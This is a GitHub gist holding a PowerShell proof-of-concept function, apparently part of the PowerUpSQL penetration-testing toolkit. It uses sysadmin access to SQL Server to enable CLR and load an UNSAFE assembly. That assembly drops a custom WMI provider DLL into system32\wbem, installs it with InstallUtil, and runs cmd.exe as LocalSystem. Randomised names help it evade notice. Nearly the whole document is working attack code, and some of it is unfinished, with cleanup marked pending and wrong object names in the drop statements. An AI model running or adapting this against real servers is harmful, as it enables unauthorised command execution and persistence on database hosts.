Skip to content

Instantly share code, notes, and snippets.

@nullbind

nullbind/Invoke-SQLOSCmdCLRWMIProvider.ps1

Last active September 18, 2017 23:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nullbind/6b7b3891fd77887abc579f973fccf619 to your computer and use it in GitHub Desktop.
Save nullbind/6b7b3891fd77887abc579f973fccf619 to your computer and use it in GitHub Desktop.
Download ZIP
PowerUpSQL Function - Invoke-SQLOSCmdCLRWMIProvider- PoC. Working but not stable.
Raw
Invoke-SQLOSCmdCLRWMIProvider.ps1
# todo
<#
- Note: dependant on PowerUpSQL.
1 - have script accept command or source script as string
--- have that get bake into the wmi provider method
--- update the wmi method to execute the provided string as a script block
--- mod the clr to return the output of the wmi command
- roll into clone of the invoke-sqloscmdclr function so it can scale
- remove wmi cs and dll on client
- remove sql dll cs and dll on client
- deregister sp on sql server
- deregister assembly on sql server
- deregister wmi and remove .dll from sql server
- dynamically find the installutil.exe, it is currently hardcoded
- update variables to make more sense
#>
# ----------------------------------
# Invoke-SQLOSCmdCLRWMIProvider
# ----------------------------------
# Author: Scott Sutherland and Alexand Leary
Function Invoke-SQLOSCmdCLRWMIProvider
{
<#
.SYNOPSIS
This registers a CLR assembly, that registers a custom WMI provider,
then the clr assembly will run the custom method. The method accept a string
that is executed as a runspace script block.
Supports threading, raw output, and table output.
.PARAMETER Username
SQL Server or domain account to authenticate with.
.PARAMETER Password
SQL Server or domain account password to authenticate with.
.PARAMETER Credential
SQL Server credential.
.PARAMETER Instance
SQL Server instance to connection to.
.PARAMETER DAC
Connect using Dedicated Admin Connection.
.PARAMETER TimeOut
Connection time out.
.PARAMETER SuppressVerbose
Suppress verbose errors. Used when function is wrapped.
.PARAMETER Threads
Number of concurrent threads.
.PARAMETER Command
Operating command to be executed on the SQL Server.
.PARAMETER RawResults
Just show the raw results without the computer or instance name.
.EXAMPLE
PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdCLR -Verbose -Command "whoami"
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory = $false,
HelpMessage = 'SQL Server or domain account to authenticate with.')]
[string]$Username,
[Parameter(Mandatory = $false,
HelpMessage = 'SQL Server or domain account password to authenticate with.')]
[string]$Password,
[Parameter(Mandatory = $false,
HelpMessage = 'Windows credentials.')]
[System.Management.Automation.PSCredential]
[System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,
[Parameter(Mandatory = $false,
ValueFromPipeline = $true,
ValueFromPipelineByPropertyName = $true,
HelpMessage = 'SQL Server instance to connection to.')]
[string]$Instance,
[Parameter(Mandatory = $false,
HelpMessage = 'Connect using Dedicated Admin Connection.')]
[Switch]$DAC,
[Parameter(Mandatory = $false,
HelpMessage = 'OS command to be executed.')]
[String]$Command,
[Parameter(Mandatory = $false,
HelpMessage = 'Connection timeout.')]
[string]$TimeOut,
[Parameter(Mandatory = $false,
HelpMessage = 'Number of threads.')]
[int]$Threads = 1,
[Parameter(Mandatory = $false,
HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')]
[switch]$SuppressVerbose,
[Parameter(Mandatory = $false,
HelpMessage = 'Just show the raw results without the computer or instance name.')]
[switch]$RawResults
)
Begin
{
# Setup data table for output
$TblCommands = New-Object -TypeName System.Data.DataTable
$TblResults = New-Object -TypeName System.Data.DataTable
$null = $TblResults.Columns.Add('ComputerName')
$null = $TblResults.Columns.Add('Instance')
$null = $TblResults.Columns.Add('CommandResults')
# Setup data table for pipeline threading
$PipelineItems = New-Object -TypeName System.Data.DataTable
# set instance to local host by default
if(-not $Instance)
{
$Instance = $env:COMPUTERNAME
}
# Ensure provided instance is processed
if($Instance)
{
$ProvideInstance = New-Object -TypeName PSObject -Property @{
Instance = $Instance
}
}
# Add instance to instance list
$PipelineItems = $PipelineItems + $ProvideInstance
}
Process
{
# Create list of pipeline items
$PipelineItems = $PipelineItems + $_
}
End
{
# Define code to be multi-threaded
$MyScriptBlock = {
$Instance = $_.Instance
# Parse computer name from the instance
$ComputerName = Get-ComputerNameFromInstance -Instance $Instance
# Default connection to local default instance
if(-not $Instance)
{
$Instance = $env:COMPUTERNAME
}
# Setup DAC string
if($DAC)
{
# Create connection object
$Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut
}
else
{
# Create connection object
$Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut
}
# Attempt connection
try
{
# Open connection
$Connection.Open()
if(-not $SuppressVerbose)
{
Write-Verbose -Message "$Instance : Connection Success."
}
# Switch to track CLR status
$DisableShowAdvancedOptions = 0
$DisableCLR = 0
# Get sysadmin status
$IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin
# Check if CLR is enabled
if($IsSysadmin -eq 'Yes')
{
Write-Verbose -Message "$Instance : You are a sysadmin."
$IsCLREnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value
$IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value
}
else
{
Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges."
# Add record
$null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.')
return
}
# Enable show advanced options if needed
if ($IsShowAdvancedEnabled -eq 1)
{
Write-Verbose -Message "$Instance : Show Advanced Options is already enabled."
}
else
{
Write-Verbose -Message "$Instance : Show Advanced Options is disabled."
$DisableShowAdvancedOptions = 1
# Try to enable Show Advanced Options
Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose
# Check if configuration change worked
$IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value
if ($IsShowAdvancedEnabled2 -eq 1)
{
Write-Verbose -Message "$Instance : Enabled Show Advanced Options."
}
else
{
Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting."
# Add record
$null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.')
return
}
}
# Enable CLR if needed
if ($IsCLREnabled -eq 1)
{
Write-Verbose -Message "$Instance : CLR is already enabled."
}
else
{
Write-Verbose -Message "$Instance : CLR is disabled."
$DisableCLR = 1
# Try to enable CLR
Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose
# Check if configuration change worked
$IsCLREnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "CLR Enabled"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value
if ($IsCLREnabled2 -eq 1)
{
Write-Verbose -Message "$Instance : Enabled CLR."
}
else
{
Write-Verbose -Message "$Instance : Enabling CLR failed. Aborting."
# Add record
$null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable CLR.')
return
}
}
# -----------------------------------
# Setup and Compile WMI Provider DLL
# -----------------------------------
# Status user
Write-Verbose -Message "$Instance : Generating WMI provider C# Code"
# Create random WMI name space
$WMINameSpaceLen = (5..10 | Get-Random -count 1 )
$WMINameSpace = (-join ((65..90) + (97..122) | Get-Random -Count $WMINameSpaceLen | % {[char]$_}))
Write-Verbose -Message "$Instance : - WMI Provider name space: $WMINameSpace"
# Create random WMI class name
$WMIClassLen = (5..10 | Get-Random -count 1 )
$WMIClass = (-join ((65..90) + (97..122) | Get-Random -Count $WMIClassLen | % {[char]$_}))
Write-Verbose -Message "$Instance : - WMI Provider class: $WMIClass"
# Create random WMI method name
$WMIMethodLen = (5..10 | Get-Random -count 1 )
$WMIMethod = (-join ((65..90) + (97..122) | Get-Random -Count $WMIMethodLen | % {[char]$_}))
Write-Verbose -Message "$Instance : - WMI Provider Method: $WMIMethod "
# Create random WMI provider file name
$WmiFileNameLen = (5..10 | Get-Random -count 1 )
$WmiFileName = (-join ((65..90) + (97..122) | Get-Random -Count $WmiFileNameLen | % {[char]$_}))
Write-Verbose -Message "$Instance : - WMI Provider file name: $WmiFileName.dll"
# Define WMI provider code
$WMICS = "
using System;
using System.Collections;
using System.Management;
using System.Management.Instrumentation;
using System.Runtime.InteropServices;
using System.Configuration.Install;
[assembly: WmiConfiguration(@`"root\cimv2`", HostingModel = ManagementHostingModel.LocalSystem)]
namespace $WMINameSpace
{
[System.ComponentModel.RunInstaller(true)]
public class MyInstall : DefaultManagementInstaller
{
//private static string fileName = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
public override void Install(IDictionary stateSaver)
{
try
{
new System.EnterpriseServices.Internal.Publish().GacInstall(`"$WmiFileName.dll`");
base.Install(stateSaver);
RegistrationServices registrationServices = new RegistrationServices();
}
catch { }
}
public override void Uninstall(IDictionary savedState)
{
try
{
new System.EnterpriseServices.Internal.Publish().GacRemove(`"$WmiFileName.dll`");
ManagementClass managementClass = new ManagementClass(@`"root\cimv2:Win32_$WMIClass`");
managementClass.Delete();
}
catch { }
try
{
base.Uninstall(savedState);
}
catch { }
}
}
[ManagementEntity(Name = `"Win32_$WMIClass`")]
public class $WMIClass
{
[ManagementTask]
public static string $WMIMethod(string command, string parameters)
{
// Write a file to c:\temp\doit.txt using wmi
object[] theProcessToRun = { `"c:\\windows\\system32\\cmd.exe /C \`"echo testing123$WMIMethod > c:\\temp\\doit.txt \`"`" };
ManagementClass mClass = new ManagementClass(@`"\\`" + `"127.0.0.1`" + @`"\root\cimv2:Win32_Process`");
mClass.InvokeMethod(`"Create`", theProcessToRun);
// Return test script
return `"test`";
}
}
}"
# Write c sharp code to a file
$OutDir = $env:temp
$OutFileName = $WmiFileName
$OutFilePath = "$OutDir\$OutFileName.cs"
Write-Verbose -Message "$Instance : Writing WMI provider code to: $OutFilePath"
$WMICS | Out-File $OutFilePath
# Identify the path to csc.exe
Write-Verbose -Message "$Instance : Searching for .net framework v3 csc.exe"
$CSCPath = Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" | where {$_.FullName -like "*v3*" -and $_.fullname -like "*Framework64*"} | Select-Object fullname -First 1 -ExpandProperty fullname
if(-not $CSCPath){
Write-Verbose -Message "$Instance : No csc.exe found."
return
}else{
Write-Verbose -Message "$Instance : Found csc.exe: $CSCPath"
}
# Compile the .cs file to a .dll using csc.exe
$CurrentDirectory = pwd
cd $OutDir
$Command = "$CSCPath /target:library /R:system.configuration.install.dll /R:system.enterpriseservices.dll /R:system.management.dll /R:system.management.instrumentation.dll " + $OutFilePath
Write-Verbose -Message "$Instance : Compiling WMI provider code to: $OutDir\$OutFileName.dll"
$Results = Invoke-Expression $Command
cd $CurrentDirectory
$WMIFilePath1 = "$OutDir\$OutFileName.dll"
# ------------------------------------
# Setup and Compile SQL Server CLR DLL
# ------------------------------------
Write-Verbose -Message "$Instance : Converting WMI provider DLL to base64"
# Read the DLL into a byte array
$FileBytes = [System.IO.File]::ReadAllBytes("$WMIFilePath1")
# Convert the byte array in the a Base64 string
$FileBytes64 = [Convert]::ToBase64String($FileBytes);
# Remove dll and cs files - pending
Write-Verbose -Message "$Instance : Generating SQL Server CLR C# Code"
# Define random variables for the clr
$AssemblyLength = (5..10 | Get-Random -count 1 )
$AssemblyName = (-join ((65..90) + (97..122) | Get-Random -Count $AssemblyLength | % {[char]$_}))
Write-Verbose -Message "$Instance : - SQL CLR Assembly Name: $AssemblyName.dll"
$ClassNameLength = (5..10 | Get-Random -count 1 )
$ClassName = (-join ((65..90) + (97..122) | Get-Random -Count $ClassNameLength | % {[char]$_}))
Write-Verbose -Message "$Instance : - SQL CLR ClassName: $ClassName"
$MethodNameLength = (5..10 | Get-Random -count 1 )
$MethodName = (-join ((65..90) + (97..122) | Get-Random -Count $MethodNameLength | % {[char]$_}))
Write-Verbose -Message "$Instance : - SQL CLR MethodName: $MethodName"
$ProcNameLength = (5..10 | Get-Random -count 1 )
$ProcName = (-join ((65..90) + (97..122) | Get-Random -Count $ProcNameLength | % {[char]$_}))
Write-Verbose -Message "$Instance : - SQL CLR Proc Name: $ProcName"
# Define SQL Server CLR Assembly Code
$TemplateCmdExec = @"
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;
using System.Collections.Generic;
using System.Management;
public partial class $ClassName
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void $MethodName (SqlString execCommand)
{
// Check for local administrator privileges - pending
// Convert Base64 to byte array
byte[] MyByteArray2 = Convert.FromBase64String("$FileBytes64");
// Write all bytes to another file
File.WriteAllBytes("c:\\windows\\system32\\wbem\\$WmiFileName.dll",MyByteArray2);
// Create new process to install the wmi provider
Process proc = new Process();
proc.StartInfo.FileName = @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe";
proc.StartInfo.Arguments = string.Format(@" c:\\windows\\system32\\wbem\\$WmiFileName.dll", execCommand.Value);
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
// Execute custom wmi method from custom wmi class via wmi using c sharp
ManagementClass mClass = new ManagementClass(@"\\" + "127.0.0.1" + @"\root\cimv2:Win32_$WMIClass");
object results = mClass.InvokeMethod("$WMIMethod", null);
// Test getting process list - multiple line output reading
// ManagementClass c = new ManagementClass("Win32_Process");
// StringBuilder builder = new StringBuilder();
// foreach (ManagementObject o in c.GetInstances())
// builder.Append(o).AppendLine(o["Name"].ToString());
// Create the record and specify the metadata for the columns.
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
// Mark the begining of the result-set.
SqlContext.Pipe.SendResultsStart(record);
// Set values for each column in the row
record.SetString(0, results.ToString());
// Send the row back to the client.
SqlContext.Pipe.SendResultsRow(record);
// Mark the end of the result-set.
SqlContext.Pipe.SendResultsEnd();
proc.WaitForExit();
proc.Close();
// Remove provider - pending
// Remove dll - pending
}
};
"@
# Write out the cs code
$ClrFileNameLen = (5..10 | Get-Random -count 1 )
$ClrFileName = (-join ((65..90) + (97..122) | Get-Random -Count $ClrFileNameLen | % {[char]$_}))
$SRCPath = $OutDir + "\$ClrFileName.cs"
Write-Verbose -Message "$Instance : Writing SQL Server CLR code to: $SRCPath"
$TemplateCmdExec | Out-File $SRCPath
# Setup and compile the dll
$CurrentDirectory = pwd
cd $OutDir
$Command = "$CSCPath /target:library " + $OutDir + "\$ClrFileName.cs"
Write-Verbose -Message "$Instance : Compiling SQL Server CLR code to: $OutDir\$ClrFileName.dll"
$Results = Invoke-Expression $Command
cd $CurrentDirectory
# --------------------------------------
# Install and CLR DLLs on the SQL Server
# --------------------------------------
# Register system.management.dll w
# Note: This is required for the C Sharp CLR to call WMI
Write-Verbose -Message "$Instance : Registering assembly system.management.dll on SQL Server instance"
$stringBuilder0 = New-Object -Type System.Text.StringBuilder
$null = $stringBuilder0.AppendLine("CREATE ASSEMBLY [system.management]")
$null = $stringBuilder0.AppendLine("from 'C:\windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll'")
$null = $stringBuilder0.AppendLine("with permission_set = unsafe")
$stringBuilder0cmd= $stringBuilder0.ToString() -join ""
$Result0 = Get-SQLQuery -ReturnError -Instance $Instance -Query $stringBuilder0cmd -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database msdb
# Set paths to CLR dll
$assemblyFile = "$OutDir\$ClrFileName.dll"
# Generate TSQL CREATE ASSEMBLY string
Write-Verbose -Message "$Instance : Generating CREATE ASSEMBLY TSQL from SQL Server CLR DLL"
$stringBuilder1 = New-Object -Type System.Text.StringBuilder
$stringBuilder1.Append("CREATE ASSEMBLY [") > $null
$stringBuilder1.Append($AssemblyName) > $null
$stringBuilder1.Append("] AUTHORIZATION [dbo] FROM `n0x") > $null
$fileStream = [IO.File]::OpenRead($assemblyFile)
while (($byte = $fileStream.ReadByte()) -gt -1) {
$stringBuilder1.Append($byte.ToString("X2")) > $null
}
$fileStream.Close()
$fileStream.Dispose()
$null = $stringBuilder1.AppendLine("`nWITH PERMISSION_SET = UNSAFE")
$stringBuilder1cmd= $stringBuilder1.ToString() -join ""
# Execute CREATE ASSEMBLY string
Write-Verbose -Message "$Instance : Executing CREATE ASSEMBLY TSQL on SQL Server"
$Result1 = Get-SQLQuery -ReturnError -Instance $Instance -Query $stringBuilder1cmd -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database msdb
# Create CREATE PROCEDURE string
Write-Verbose -Message "$Instance : Generating CREATE PROCEDURE TSQL"
$stringBuilder2 = New-Object -Type System.Text.StringBuilder
$null = $stringBuilder2.AppendLine("CREATE PROCEDURE [dbo].[$ProcName] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [$AssemblyName].[$ClassName].[$MethodName];")
$stringBuilder2cmd= $stringBuilder2.ToString() -join ""
# Execute CREATE PROCEDURE string
Write-Verbose -Message "$Instance : Executing CREATE PROCEDURE TSQL on SQL Server"
$Result2 = Get-SQLQuery -ReturnError -Instance $Instance -Query $stringBuilder2cmd -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database msdb
# Create execute procedure string
Write-Verbose -Message "$Instance : Generating exec statement for CLR sp in TSQL"
$stringBuilder3 = New-Object -Type System.Text.StringBuilder
$null = $stringBuilder3.AppendLine("EXEC[dbo].[$ProcName] 'whoami'")
$stringBuilder3cmd= $stringBuilder3.ToString() -join ""
# Execute sp string
Write-Verbose -Message "$Instance : Executing CLR sp on SQL Server (which will install the custom wmi provider and run the target wmi method)"
$CmdResults = Get-SQLQuery -Instance $Instance -Query $stringBuilder3cmd -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database msdb
# Status user
Write-Verbose -Message "$Instance : Dest WMI filename on sql server: c:\windows\system32\wbem\$WmiFileName.dll"
Write-Verbose -Message "$Instance : manual wmic command: invoke-wmimethod -class Win32_$WMIClass -Name $WMIMethod"
# Execute OS command
# $CmdResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" | Select-Object -Property output -ExpandProperty output
# Display results or add to final results table
if($RawResults)
{
[string]$CmdResults.output
}
else
{
$null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.output)
}
# Remove procedure and assembly
Get-SQLQuery -Instance $Instance -Query "DROP PROCEDURE cmd_exec" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB"
Get-SQLQuery -Instance $Instance -Query "DROP ASSEMBLY cmd_exec" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB"
#>
# Restore CLR state if needed
if($DisableCLR -eq 1)
{
Write-Verbose -Message "$Instance : Disabling CLR"
Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose
}
# Restore Show Advanced Options state if needed
if($DisableShowAdvancedOptions -eq 1)
{
Write-Verbose -Message "$Instance : Disabling Show Advanced Options"
Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose
}
# Close connection
$Connection.Close()
# Dispose connection
$Connection.Dispose()
}
catch
{
# Connection failed
if(-not $SuppressVerbose)
{
$ErrorMessage = $_.Exception.Message
Write-Verbose -Message "$Instance : Connection Failed."
#Write-Verbose " Error: $ErrorMessage"
}
# Add record
$null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible')
}
}
# Run scriptblock using multi-threading
$PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue
return $TblResults
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment